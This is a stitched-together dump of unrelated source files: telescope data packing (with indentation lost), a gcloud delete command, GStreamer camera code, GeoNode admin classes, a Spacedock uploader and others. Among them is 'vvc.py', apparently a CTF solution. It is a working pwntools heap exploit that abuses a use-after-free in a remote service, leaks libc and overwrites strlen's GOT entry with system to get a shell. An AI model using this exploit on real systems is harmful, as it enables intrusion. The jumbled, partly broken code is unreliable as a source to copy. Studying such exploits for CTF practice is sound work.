# Geometric delay (-w coordinate) for each antenna, relative to antenna 1,
# for current time (stateframe timestamp), and again for current time plus
# 1 s (delay1).
# Default is array of zeros (=> not tracking phase center)
# Write dimensions into data stream
fmt += 'II'
buf += struct.pack('II',16,2)
item = sf_dict.get('delay',default_delay)
fmt += '32d'
for i in item:
buf += struct.pack('d',i)
item = sf_dict.get('delay1',default_delay)
for i in item:
buf += struct.pack('d',i)
if mk_xml:
xml.write('<Array>\n')
xml.write('<Name>Delay</Name>\n')
xml.write('<Dimsize>16</Dimsize><Dimsize>2</Dimsize>\n<DBL>\n<Name></Name>\n<Val></Val>\n</DBL>\n')
xml.write('</Array>\n')
return fmt, buf
def __starburst_stateframe(sf_dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
# Append XML for Starburst cluster.
if mk_xml:
xml.write('<Cluster>\n')
xml.write('<Name>Starburst</Name>\n')
xml.write('<NumElts>' + str(Nelements_starburst) + '</NumElts>\n')
# ======================================================================
# Start of LO/Noise Module dump.
# ======================================================================
dict = sf_dict.get("starburst", {}).get("LONOISE", {})
# Append XML for LONoiseModule cluster.
if mk_xml:
xml.write('<Cluster>\n')
xml.write('<Name>LONM</Name>\n')
xml.write('<NumElts>' + str(Nelements_lonoise) + '</NumElts>')
# Handle all generic LabJack properties
append_fmt, append_buf = __generic_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# Handle LO/Noise source LabJack properties
append_fmt, append_buf = __lonoise_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# ----------------------------------------------------------------------
# End of LO/Noise Module parsing.
if mk_xml:
xml.write('</Cluster>\n')
# ======================================================================
# Start of AntennaA Module dump.
# ======================================================================
dict = sf_dict.get("starburst", {}).get("A", {})
    # Append XML for Antenna A DCM cluster.
if mk_xml:
xml.write('<Cluster>\n')
xml.write('<Name>DCMA</Name>\n')
xml.write('<NumElts>' + str(Nelements_antenna) + '</NumElts>')
# Handle all generic LabJack properties
append_fmt, append_buf = __generic_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# Handle Antenna A LabJack properties
append_fmt, append_buf = __antenna_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# ----------------------------------------------------------------------
# End of AntennaA Module parsing.
if mk_xml:
xml.write('</Cluster>\n')
# ======================================================================
# Start of AntennaB Module dump.
# ======================================================================
dict = sf_dict.get("starburst", {}).get("B", {})
    # Append XML for Antenna B DCM cluster.
if mk_xml:
xml.write('<Cluster>\n')
xml.write('<Name>DCMB</Name>\n')
xml.write('<NumElts>' + str(Nelements_antenna) + '</NumElts>')
# Handle all generic LabJack properties
append_fmt, append_buf = __generic_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# Handle Antenna B LabJack properties
append_fmt, append_buf = __antenna_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# ----------------------------------------------------------------------
# End of AntennaB Module parsing.
if mk_xml:
xml.write('</Cluster>\n')
# ======================================================================
# Include Starburst Version
# ======================================================================
item = starburst_version
fmt += 'I'
buf += struct.pack('I',item)
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>Version</Name>\n')
xml.write('<Val>' + str(item) + '</Val>\n')
xml.write('</U32>\n')
# ======================================================================
# Wrap up end of Starburst cluster.
if mk_xml:
xml.write('</Cluster>')
# ======================================================================
return fmt, buf | mit | -6,084,764,854,640,835,000 | 30.567095 | 106 | 0.436493 | false | 4.081473 | false | false | false |
KaranToor/MA450 | google-cloud-sdk/lib/surface/iam/service_accounts/delete.py | 2 | 2130 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for deleting service accounts."""
import textwrap
from apitools.base.py import exceptions
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.iam import base_classes
from googlecloudsdk.command_lib.iam import iam_util
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base_classes.BaseIamCommand, base.DeleteCommand):
"""Delete a service account from a project."""
detailed_help = {
'DESCRIPTION': '{description}',
'EXAMPLES': textwrap.dedent("""\
          To delete a service account from your project, run:
$ {command} [email protected]
"""),
}
@staticmethod
def Args(parser):
# TODO(user): add tab completion.
parser.add_argument('account',
metavar='IAM-ACCOUNT',
help='The service account to delete.')
def Run(self, args):
try:
console_io.PromptContinue(message='You are about to delete service '
'account [{0}].'.format(args.account),
cancel_on_no=True)
self.iam_client.projects_serviceAccounts.Delete(
self.messages.IamProjectsServiceAccountsDeleteRequest(
name=iam_util.EmailToAccountResourceName(args.account)))
log.status.Print('deleted service account [{0}]'.format(args.account))
except exceptions.HttpError as error:
raise iam_util.ConvertToServiceAccountException(error, args.account)
| apache-2.0 | 7,105,143,336,546,863,000 | 35.724138 | 78 | 0.69108 | false | 4.268537 | false | false | false |
AstroPrint/AstroBox | src/astroprint/camera/v4l2/gstreamer/process/pipelines/bins/v4l2_video_src.py | 1 | 4311 | # coding=utf-8
__author__ = "AstroPrint Product Team <[email protected]>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
import platform
from gi.repository import Gst
from .base_video_src import VideoSrcBinBase
from astroprint.manufacturerpkg import manufacturerPkgManager
#
# Base class for V4L2 Based Video sources
#
class V4L2VideoSrcBin(VideoSrcBinBase):
def __init__(self, pipeline, device, size, rotation):
distName, distVersion, id = platform.linux_distribution()
self._linuxDistVersion = int(distVersion.split('.')[0])
self.__useVideoConvert = self._linuxDistVersion > 9
self.__videoSourceElement = None
self.__videoConvertElement = None
self.__videoLogoElement = None
self.__videoSourceCaps = None
super(V4L2VideoSrcBin, self).__init__(pipeline, device, size, rotation)
	# Creates, adds to the bin, and links elements for the source chain. Returns the last element of the chain.
def _constructSrcChain(self):
self.__videoSourceElement = Gst.ElementFactory.make('v4l2src', 'video_source')
self.__videoSourceElement.set_property("device", self._device)
if self.__useVideoConvert:
self.__videoConvertElement = Gst.ElementFactory.make('videoconvert', 'vconvert')
self.__videoSourceCaps = Gst.ElementFactory.make("capsfilter", "caps_filter")
self.__videoSourceCaps.set_property("caps", Gst.Caps.from_string(self._getVideoSourceCaps()))
#Add Elements to the pipeline
self._bin.add(self.__videoSourceElement)
self._bin.add(self.__videoSourceCaps)
if self.__videoConvertElement:
self._bin.add(self.__videoConvertElement)
self.__videoSourceElement.link(self.__videoSourceCaps)
if self.__videoConvertElement:
self.__videoSourceCaps.link(self.__videoConvertElement)
lastLink = self.__videoConvertElement
else:
lastLink = self.__videoSourceCaps
width, height = self._size
#check if we need to rotate the video
if self._rotation != 0:
if self._rotation in [1,3]:
				#dimensions are flipped
height, width = self._size
self.__videoflipElement = Gst.ElementFactory.make('videoflip', 'videoflip')
self.__videoflipElement.set_property("method", self._rotation)
self._bin.add(self.__videoflipElement)
lastLink.link(self.__videoflipElement)
lastLink = self.__videoflipElement
mfWatermark = manufacturerPkgManager().video_watermark
if mfWatermark is False: #There is no watermark
return lastLink
else: # We need to setup a watermark
logoHeight = round(height * self.LOGO_HEIGHT_PERCENT)
logoWidth = round(logoHeight / self.LOGO_ASPECT_RATIO)
			# AstroPrint's logo overlaid in the bottom-right corner
self.__videoLogoElement = Gst.ElementFactory.make('gdkpixbufoverlay', 'logo_overlay')
if mfWatermark is None: # Use AstroPrint's default
self.__videoLogoElement.set_property('location', '/AstroBox/src/astroprint/static/img/astroprint_logo.png')
else:
self.__videoLogoElement.set_property('location', '/AstroBox/src/astroprint/static/img/variant/%s' % mfWatermark)
self.__videoLogoElement.set_property('overlay-width', logoWidth)
self.__videoLogoElement.set_property('overlay-height', logoHeight)
self.__videoLogoElement.set_property('offset-x', width - ( logoWidth + 10 ) )
self.__videoLogoElement.set_property('offset-y', height - ( logoHeight + 5 ) )
self._bin.add(self.__videoLogoElement)
lastLink.link(self.__videoLogoElement)
return self.__videoLogoElement
#Implement this in the subclasses below
def _getVideoSourceCaps(self):
pass
#
# Base class for USB Based Video sources
#
class UsbVideoSrcBin(V4L2VideoSrcBin):
def _getVideoSourceCaps(self):
if self._linuxDistVersion <= 9:
return 'video/x-raw,format={ I420, YV12, Y41B, Y42B, YVYU, Y444, NV21, NV12, RGB, BGR, RGBx, xRGB, BGRx, xBGR, GRAY8 },width=%d,height=%d,framerate={ 5/1, 10/1, 15/1, 25/1, 30/1 }' % self._size
else:
return 'video/x-raw,width=%d,height=%d,framerate={ 5/1, 10/1, 15/1, 25/1, 30/1 }' % self._size
#
# Base class for Raspicam Based Video sources
#
class RaspicamVideoSrcBin(V4L2VideoSrcBin):
def _getVideoSourceCaps(self):
if self._linuxDistVersion <= 9:
return 'video/x-raw,format=I420,width=%d,height=%d,framerate=30/1' % self._size
else:
return 'video/x-raw,width=%d,height=%d,framerate=30/1' % self._size
| agpl-3.0 | -6,529,463,372,635,997,000 | 34.04878 | 196 | 0.729761 | false | 3.059617 | false | false | false |
simod/geonode | geonode/contrib/worldmap/wm_extra/admin.py | 2 | 1612 | from django.contrib import admin
from .models import ExtLayer, ExtMap, ExtLayerAttribute, LayerStats, MapStats, Endpoint, Action
class ExtLayerAdmin(admin.ModelAdmin):
list_display = (
'layer',
'last_modified',
'gazetteer_project',
'in_gazetteer',
'searchable',
'last_modified',
)
class ExtMapAdmin(admin.ModelAdmin):
list_display = (
'map',
'content_map',
)
class LayerStatsAdmin(admin.ModelAdmin):
list_display = (
'layer',
'visits',
'uniques',
'last_modified',
)
class MapStatsAdmin(admin.ModelAdmin):
list_display = (
'map',
'visits',
'uniques',
'last_modified',
)
class ExtLayerAttributeAdmin(admin.ModelAdmin):
list_display = (
'layer_name',
'searchable',
)
class EndpointAdmin(admin.ModelAdmin):
list_display = ('id', 'description', 'owner', 'url')
list_display_links = ('id',)
search_fields = ['description', 'url']
class ActionAdmin(admin.ModelAdmin):
"""
Admin for Action.
"""
list_display = ('id', 'timestamp', 'action_type', 'description', )
list_filter = ('action_type', )
date_hierarchy = 'timestamp'
ordering = ('-timestamp',)
admin.site.register(ExtLayer, ExtLayerAdmin)
admin.site.register(ExtMap, ExtMapAdmin)
admin.site.register(LayerStats, LayerStatsAdmin)
admin.site.register(MapStats, MapStatsAdmin)
admin.site.register(ExtLayerAttribute, ExtLayerAttributeAdmin)
admin.site.register(Endpoint, EndpointAdmin)
admin.site.register(Action, ActionAdmin)
| gpl-3.0 | -6,687,725,279,111,101,000 | 21.704225 | 95 | 0.637717 | false | 3.647059 | false | false | false |
bluecube/codecad | codecad/shapes/__init__.py | 1 | 2712 | """ User facing constructors for basic shapes.
Names from this module may optionally be imported as "from codecad.shapes import *".
Basic shape interface is composed of functions defined here and of methods on
Shape objects (transformations, shell, extrude ...)"""
import math
from . import simple2d as _s2
from . import simple3d as _s3
from . import polygons2d as _polygons2d
from . import unsafe
from . import gears
from . import airfoils
def rectangle(x=1, y=None):
if y is None:
y = x
return _s2.Rectangle(x, y)
def circle(d=1, r=None):
return _s2.Circle(d, r)
def half_plane():
return _s2.HalfPlane()
def regular_polygon2d(n, d=1, r=None, side_length=None, across_flats=None):
return _s2.RegularPolygon2D(n, d, r, side_length, across_flats)
def polygon2d(points):
return _polygons2d.Polygon2D(points)
def polygon2d_builder(origin_x, origin_y):
return _polygons2d.Polygon2D.build(origin_x, origin_y)
def capsule(x1, y1, x2, y2, width):
""" Use zero thickness rectangle trick to model a 2D capsule between two points """
dx = x2 - x1
dy = y2 - y1
length = math.hypot(dx, dy)
angle = math.atan2(dy, dx)
return (
rectangle(length, 0)
.offset(width / 2)
.rotated(math.degrees(angle))
.translated((x1 + x2) / 2, (y1 + y2) / 2)
)
def box(x=1, y=None, z=None):
if (y is None) != (z is None):
raise ValueError("y and z must either both be None, or both be number")
if y is None:
y = x
z = x
return rectangle(x, y).extruded(z)
def sphere(d=1, r=None):
if r is not None:
d = 2 * r
return _s3.Sphere(d)
def cylinder(h=1, d=1, r=None, symmetrical=True):
return circle(d=d, r=r).extruded(h, symmetrical)
def half_space():
return _s3.HalfSpace()
def _group_op_helper(shapes, name, op2, op3, r):
""" Check that shapes is not empty and that dimensions match """
shapes = list(shapes)
if len(shapes) == 0:
raise ValueError(
name + " of empty set objects doesn't make much sense, does it?"
)
elif len(shapes) == 1:
return shapes[0]
else:
dim = shapes[0].dimension()
if any(shape.dimension() != dim for shape in shapes):
raise ValueError(name + " needs shapes of identical dimensions")
if dim == 2:
return op2(shapes, r=r)
else:
return op3(shapes, r=r)
def union(shapes, r=-1):
return _group_op_helper(shapes, "Union", _s2.Union2D, _s3.Union, r)
def intersection(shapes, r=-1):
return _group_op_helper(
shapes, "Intersection", _s2.Intersection2D, _s3.Intersection, r
)
# pylama:ignore=W0611
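if __name__ == "__main__":
    # Hedged usage sketch (illustrative sizes): build a rounded union of a box and
    # a sphere, and a 2D capsule using the zero-thickness-rectangle trick from
    # capsule(). Only shape objects are constructed here; nothing is rendered.
    demo_3d = union([box(10, 10, 5), sphere(d=8)], r=1)
    demo_2d = capsule(0, 0, 10, 5, width=2)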
| gpl-3.0 | 7,885,684,380,373,062,000 | 23.214286 | 87 | 0.623156 | false | 3.106529 | false | false | false |
praxigento/damvitool | damvitool/view.py | 1 | 3902 | from json import dumps
from damvitool.utils import to_json_type
from morepath import redirect, Response, NO_IDENTITY, Identity
from damvitool.main import DamvitoolApp
from damvitool.model import Root, Database, Table, Record, UniGridRequest
from webob.exc import HTTPException
__author__ = 'alex-smirnov'
@DamvitoolApp.json(model=Root)
def root_default(self, request):
return self.get_schema(request)
@DamvitoolApp.json(model=Database, permission=Identity)
def database(self, request):
return self.get_schema(request)
@DamvitoolApp.json(model=Database, name='mode', permission=Identity)
def database_mode(self, request):
"""Get database MODE data
"""
return self.get_mode()
@DamvitoolApp.json(model=Table, permission=Identity)
def tables(self, request):
return {
'data': [request.view(Record.from_object(r)) for r in self.select()],
'add': request.link(self, 'add')
}
@DamvitoolApp.json(model=Table, name='add', request_method='POST', permission=Identity)
def tables_add(self, request):
"""Add record to table with values form request body
"""
r = self.add(request.json)
return request.view(Record.from_object(r))
@DamvitoolApp.json(model=Record, permission=Identity)
def record(self, request):
"""Get json object with record data
"""
obj = self.get()
result_dict = {}
for column in obj.__table__.columns.keys():
result_dict[column] = to_json_type(getattr(obj, column, None))
result_dict['__url__'] = request.link(self)
# add links to related resources
result_dict['__links__'] = dict()
for foreign_key in obj.__table__.foreign_keys:
column_names = foreign_key.constraint.columns
column_values = [getattr(obj, column_name, None) for column_name in column_names]
if [val for val in column_values if val]:
table = foreign_key.column.table.name
result_dict['__links__'][foreign_key.name or str(foreign_key)] = request.link(Record(table, column_values))
return result_dict
@DamvitoolApp.json(model=Record, request_method='PATCH', permission=Identity)
def record_patch(self, request):
"""Upgrade record data
"""
r = self.patch(request.json)
return request.view(Record.from_object(r))
@DamvitoolApp.json(model=Record, request_method='PUT', permission=Identity)
def record_put(self, request):
"""Replace record data
"""
r = self.replace(request.json)
return request.view(Record.from_object(r))
@DamvitoolApp.json(model=Record, request_method='DELETE', permission=Identity)
def record_delete(self, request):
"""Delete record
"""
self.remove()
return {}
@DamvitoolApp.json(model=UniGridRequest, request_method='POST', permission=Identity)
def uni_grid_request(self, request):
return self.query(request.json)
@DamvitoolApp.json(model=UniGridRequest, name='summaries', request_method='POST', permission=Identity)
def uni_grid_request_summaries(self, request):
return self.query_summaries(request.json)
@DamvitoolApp.view(model=UniGridRequest, name='export', request_method='POST', permission=Identity)
def uni_grid_request_export(self, request):
return self.query_export(request.json)
@DamvitoolApp.view(model=Exception)
def error(self, request):
"""Error view
    Return a json object with an error description when code raises an Exception
"""
data = {
'code': 500,
'error': str(self)
}
return Response(dumps(data), content_type='application/json', status=500)
@DamvitoolApp.view(model=HTTPException)
def http_error(self, request):
"""HTTP error view
    If morepath or other code raises an HTTPException, return a json response with data about the error
"""
data = {
'code': self.code,
'error': str(self)
}
return Response(dumps(data), content_type='application/json', status=self.code)
| lgpl-3.0 | -5,720,538,941,035,803,000 | 28.119403 | 119 | 0.69631 | false | 3.47153 | false | false | false |
scwuaptx/CTF | 2017-writeup/secuinside/vvc.py | 1 | 3513 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
#host = "10.211.55.6"
#port = 8888
host = "52.79.83.139"
port = 31337
r = remote(host,port)
def register(ids,pw,name,types,profile=None):
r.recvuntil(">")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(types))
r.recvuntil(":")
r.sendline(ids)
r.recvuntil(":")
r.sendline(pw)
r.recvuntil(":")
r.sendline(name)
if types == 2 :
r.recvuntil(":")
r.sendline(profile)
def login(ids,pw):
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")
r.sendline(ids)
r.recvuntil(":")
r.sendline(pw)
def writemusic(name,lyc):
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")
r.sendline(name)
r.recvuntil(":")
r.sendline(lyc)
def delmusic(idx):
r.recvuntil(">")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
def createbox(name):
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")
r.sendline(name)
def delbox(idx):
r.recvuntil(">")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
def buymusic(idx):
r.recvuntil(">")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
def putmusic(box,idx):
r.recvuntil(">")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(box))
r.recvuntil(">")
r.sendline(str(idx))
def ret():
r.recvuntil(">")
r.sendline("5")
def ret9():
r.recvuntil(">")
r.sendline("9")
def delu(idx):
r.recvuntil(">")
r.sendline("8")
r.recvuntil(":")
r.sendline(str(idx))
def mov_box_box(src,dest,idxs,idxd):
r.recvuntil(">")
r.sendline("5")
r.recvuntil(":")
r.sendline(str(src))
r.recvuntil(":")
r.sendline(str(dest))
r.recvuntil(":")
r.sendline(str(idxs))
r.recvuntil(":")
r.sendline(str(idxd))
def editpro(data):
r.recvuntil(">")
r.sendline("3")
r.recvuntil(":")
r.sendline(data)
def showbox():
r.recvuntil(">")
r.sendline("6")
def editmusic(idx,lyc):
r.recvuntil(">")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
r.sendline(lyc)
register("ddaa","nogg","phd",1)
register("orange","nogg","phd",2,"wtf")
login("orange","nogg")
writemusic("meh","qq")
ret()
login("ddaa","nogg")
createbox("meh")
buymusic(0)
putmusic(0,0)
ret9()
login("orange","nogg")
delmusic(0)
ret()
login("ddaa","nogg")
delu(0)
mov_box_box(0,0,0,0) #trigger uaf
reg = 0x607340
createbox(p64(reg))
showbox()
r.recvuntil("Lyrics : ")
heap = u64(r.recvuntil("-")[:-1].ljust(8,"\x00")) - 0x11f30
print hex(heap)
ret9()
login("orange","nogg")
writemusic("lays","nogg")
writemusic("laysnogg","nogg")
ret()
login("ddaa","nogg")
createbox("mehqq")
buymusic(0)
putmusic(2,0)
ret9()
login("orange","nogg")
delmusic(0)
ret()
login("ddaa","nogg")
delu(0)
fake_music = heap + 0x12340
mov_box_box(2,2,0,0)
createbox(p64(fake_music))
delbox(2)
orange = heap + 0x11eb0
ret9()
register("angelboy","xx","angel",2,"a"*0x20)
login("angelboy","xx")
strlen_got = 0x605078
fake_music = p64(strlen_got)*2 + p64(0) + p64(orange)
editpro(fake_music)
ret()
login("ddaa","nogg")
r.recvuntil(">")
r.sendline("3")
r.recvuntil("1. ")
libc = u64(r.recvuntil("\n")[:-1].ljust(8,"\x00")) - 0x8b720
print hex(libc)
r.recvuntil(":")
r.sendline("4")
ret9()
login("angelboy","xx")
system = libc + 0x45390
editmusic(1,p64(system)[:6])
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")
r.sendline("sh")
r.recvuntil(":")
r.sendline("sh")
r.interactive()
| gpl-2.0 | -7,201,957,698,225,920,000 | 17.489474 | 61 | 0.592941 | false | 2.558631 | false | false | false |
tedoreve/tools | maxwell.py | 1 | 1264 | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 20 12:11:24 2018
@author: tedoreve
"""
import matplotlib.pyplot as plt
import numpy as np
import astropy.constants as con
import astropy.units as un
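# Maxwell-Boltzmann speed distribution implemented below:
#   f(v) = sqrt(2/pi) * v**2 / a**3 * exp(-v**2 / (2*a**2)),  with a = sqrt(k_B*T/m)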
def maxwell(T,m,v):
    a = np.sqrt(con.k_B*T/m)
print('a=',a.to('km/s'))
return np.sqrt(2/np.pi)*v**2/a**3 * np.exp(-v**2/2/a**2)
def ptotal(v):
dv = v[1]-v[0]
p = maxwell(T,con.m_e,v).to('s/km')*dv
return np.sum(p)
def accelerator(p,n,v):
fin = np.zeros(len(v))
for i in range(len(v)):
fin[i] = maxwell(T,con.m_e,v[i])*(1-p) + fin[i-1]*p
return fin
if __name__ == '__main__':
T = 50*un.K #ISM temperature before shock wave arrival
    p = 0.5 #probability that the particle remains within the accelerator after each cycle
    n = 1 #number of cycles
    dv = 1 #speed increment after each cycle
fig, ax = plt.subplots(1, 1)
    v = np.linspace(0, 200, int((201-0)/dv))*un.km/un.s
ax.plot(v, maxwell(T,con.m_e,v).to('s/km'),'r-', lw=5, alpha=0.6, label='maxwell pdf')
ax.set_xlabel('v (km/s)')
    ax.set_ylabel('pdf (probability per km/s)')
ax.set_title('Maxwell Speed Distribution')
plt.legend() | mit | -5,786,362,109,074,876,000 | 25.521739 | 94 | 0.554589 | false | 2.672304 | false | false | false |
jessegonzalez/grinder | src/grinder/Filter.py | 2 | 3819 | # This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
# Filters for syncing remote package repos
# Grabbed from Pulp by John Morris <[email protected]>
#
# This is the main feature I wanted Pulp for; my use case is downloading
# a limited set of packages (whitelist) from a repo without having
# to sync the whole thing, but still retain yum's smarts for grabbing new
# versions and removing old ones
import re
import logging
LOG = logging.getLogger("grinder.Filter")
class Filter(object):
"""
Class represents a 'blacklist' or 'whitelist' filter type that can be
applied when syncing a local repository
regex_list is a list of regex strings to be applied to package 'filename'
(see below); if any regex matches, the Filter.test() will be true for
whitelists or false for blacklists
use the set_regex_list method to change the regex list after object
creation; this ensures that the regexes are compiled
(actually, using 'filename' seems hackish, but it's easy to do from
the command line and with simple regexes)
(more hackish still, because the closest yum.packages.PackageObject
appears to have to a 'filename' is its '__str__()', used instead
of some actual RPM filename)
"""
def __init__(self, type, regex_list=None, description=None):
self.description = description
self.type = type
self.set_regex_list(regex_list)
def __str__(self):
return "%s, %s filter with: %s" % (self.description, self.type, self.regex_list)
    def set_regex_list(self, regex_list):
"""
Set the list of regexes & list of compiled regexes
"""
self.regex_list = []
self.regex_obj_list = []
if not regex_list:
return
for regex in regex_list:
self.regex_list.append(regex)
self.regex_obj_list.append(re.compile(regex))
def iswhitelist(self):
"""
return true if self is a whitelist
"""
return self.type == "whitelist"
def isblacklist(self):
"""
return true if self is a blacklist
"""
return self.type == "blacklist"
def test(self, pkg):
"""
return pkg if pkg passes through the filter, else None
pkg is a yum package object
"""
# the string we match against
pkg_filename = str(pkg)
# compare pkg to each regex & break if there's a match
match_result = None
for regex_obj in self.regex_obj_list:
if regex_obj.match(pkg_filename):
match_result = regex_obj.pattern
break
# return result based on match and filter type
if self.iswhitelist():
if match_result:
LOG.debug ("package %s: passed whitelist, matched %s" %
(pkg_filename, match_result))
return pkg
else:
LOG.debug ("package %s: blocked by whitelist" % pkg_filename)
return None
else:
if match_result:
LOG.debug ("package %s: blocked by blacklist, matched %s" %
(pkg_filename, match_result))
return None
else:
LOG.debug ("package %s: passed blacklist" % pkg_filename)
return pkg
| gpl-2.0 | 3,908,979,287,542,238,700 | 34.691589 | 88 | 0.622414 | false | 4.248053 | false | false | false |
ihsoft/EasyVesselSwitch | Tools/clients/SpacedockClient.py | 1 | 5778 | # Public domain license.
# Author: [email protected]
# GitHub: https://github.com/ihsoft/KSPDev_ReleaseBuilder
# $version: 1
# $date: 07/13/2018
"""A client library to communicate with Spacedock via API.
Example:
import SpacedockClient
  print 'KSP 1.4.*:', SpacedockClient.GetKSPVersions(r'1\.4\.\d+')
SpacedockClient.API_LOGIN = 'foo' # Skip to have it asked from the console.
SpacedockClient.API_PASS = 'bar' # Skip to have it asked from the console.
  SpacedockClient.UploadFile(
'/var/files/archive.zip', '# BLAH!', '1.4.4', 'MyMod-1.4')
"""
import json
import logging
import re
import urllib2
from utils import FormDataUtil
# The account credentials.
API_LOGIN = None
API_PASS = None
# Endpoint for all the API requests
API_BASE_URL = 'https://spacedock.info'
# The actions paths.
API_AUTHORIZE = '/api/login'
API_UPDATE_MOD_TMPL = '/api/mod/{mod_id}/update'
API_GET_VERSIONS = '/api/kspversions'
API_GET_MOD = '/api/mod/{mod_id}'
LOGGER = logging.getLogger('ApiClient')
# The cache for the known versions of the game. It's requested only once.
cached_versions = None
# The authorization cookie. It's only created once. To refresh it, simply
# set it to None.
authorized_cookie = None
class Error(Exception):
"""Genric API client error."""
pass
class AuthorizationRequiredError(Error):
"""The method called requires authorization, but none has been provided."""
pass
class BadCredentialsError(Error):
"""The provided authorization token is refused."""
pass
class BadResponseError(Error):
"""Generic error from the API endpoint."""
pass
def GetKSPVersions(pattern=None):
"""Gets the available versions of the game.
This method caches the versions, fetched from the server. It's OK to call it
multiple times, it will only request the server once.
This call does NOT require authorization.
Args:
pattern: A regexp string to apply on the result. If not provided, all the
versions will be returned.
Returns:
A list of objects: { 'name': <KSP name>, 'id': <Spacedock ID> }. The list
will be filtered if the pattern is set.
"""
global cached_versions
if not cached_versions:
LOGGER.debug('Requesting versions to cache...')
response = _CallAPI(_MakeAPIUrl(API_GET_VERSIONS), None, None)
cached_versions = map(
lambda x: {'name': x['friendly_version'], 'id': x['id']}, response[0])
if pattern:
regex = re.compile(pattern)
return filter(lambda x: regex.match(x['name']), cached_versions)
return cached_versions
def GetModDetails(mod_id):
"""Gets the mod informnation.
This call does NOT require authorization.
Args:
mod_id: The mod to request.
Returns:
The response object.
"""
url = _MakeAPIUrl(API_GET_MOD, mod_id=mod_id)
response_obj, _ = _CallAPI(url, None, None)
return response_obj
def UploadFile(mod_id, filepath, changelog, mod_version, game_version):
"""Uploads the file to the CurseForge project.
The new file immediately becomes a default version.
Args:
mod_id: The mod ID to update.
filepath: A full or relative path to the local file.
changelog: The change log content.
mod_version: The version of the mod being published.
game_version: The KSP version to publish for.
Returns:
The response object.
"""
headers, data = FormDataUtil.EncodeFormData([
{ 'name': 'version', 'data': mod_version },
{ 'name': 'changelog', 'data': changelog },
{ 'name': 'game-version', 'data': game_version },
{ 'name': 'notify-followers', 'data': 'yes' },
{ 'name': 'zipball', 'filename': filepath },
])
url, headers = _GetAuthorizedEndpoint(
API_UPDATE_MOD_TMPL, headers, mod_id=mod_id)
  resp, _ = _CallAPI(url, data=data, headers=headers)
  return resp
def _MakeAPIUrl(action_path, **kwargs):
"""Makes a URL for the action."""
return API_BASE_URL + action_path.format(**kwargs)
def _CallAPI(url, data, headers, raise_on_error=True):
"""Invokes the API call."""
resp_obj = { 'error': True, 'reason': 'unknown' }
try:
request = urllib2.Request(url, data, headers=headers or {})
response = urllib2.urlopen(request)
resp_obj = json.loads(response.read())
headers = response.info().dict
except urllib2.HTTPError as ex:
resp_obj = { 'error': True, 'reason': '%d - %s' % (ex.code, ex.reason) }
try:
resp_obj = json.loads(ex.read())
except:
pass # Not a JSON response
if ex.code == 401:
raise AuthorizationRequiredError(resp_obj['reason'])
if type(resp_obj) is dict and resp_obj.get('error'):
LOGGER.error('API call failed: %s', resp_obj['reason'])
if raise_on_error:
raise BadResponseError(resp_obj['reason'])
return resp_obj, None
return resp_obj, headers
def _GetAuthorizedEndpoint(api_path, headers=None, **kwargs):
"""Gets API URL and the authorization headers.
The login/password must be set in the global variables API_LOGIN/API_PASS.
"""
global authorized_cookie
url = _MakeAPIUrl(api_path, **kwargs)
LOGGER.debug('Getting authorized endpoint for: %s', url)
if not headers:
headers = {}
if not authorized_cookie:
if not API_LOGIN or not API_PASS:
raise BadCredentialsError('API_LOGIN and/or API_PASS not set')
LOGGER.info('Authorizing for login: %s', API_LOGIN)
auth_headers, data = FormDataUtil.EncodeFormData([
{ 'name': 'username', 'data': API_LOGIN },
{ 'name': 'password', 'data': API_PASS },
])
resp, auth_headers = _CallAPI(
API_BASE_URL + API_AUTHORIZE, data, auth_headers,
raise_on_error=False)
if resp['error']:
raise BadCredentialsError(resp['reason'])
authorized_cookie = auth_headers['set-cookie']
headers['Cookie'] = authorized_cookie
return url, headers
| unlicense | 1,102,166,776,733,838,200 | 28.329949 | 78 | 0.676878 | false | 3.508197 | false | false | false |
solvebio/solvebio-python | solvebio/cli/main.py | 1 | 17065 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import sys
import copy
import argparse
import solvebio
from . import auth
from . import data
from .tutorial import print_tutorial
from .ipython import launch_ipython_shell
from ..utils.validators import validate_api_host_url
from ..utils.files import get_home_dir
class TildeFixStoreAction(argparse._StoreAction):
"""A special "store" action for argparse that replaces
any detected home directory with a tilde.
(reverses bash's built-in ~ expansion).
"""
def __call__(self, parser, namespace, values, option_string=None):
home = get_home_dir()
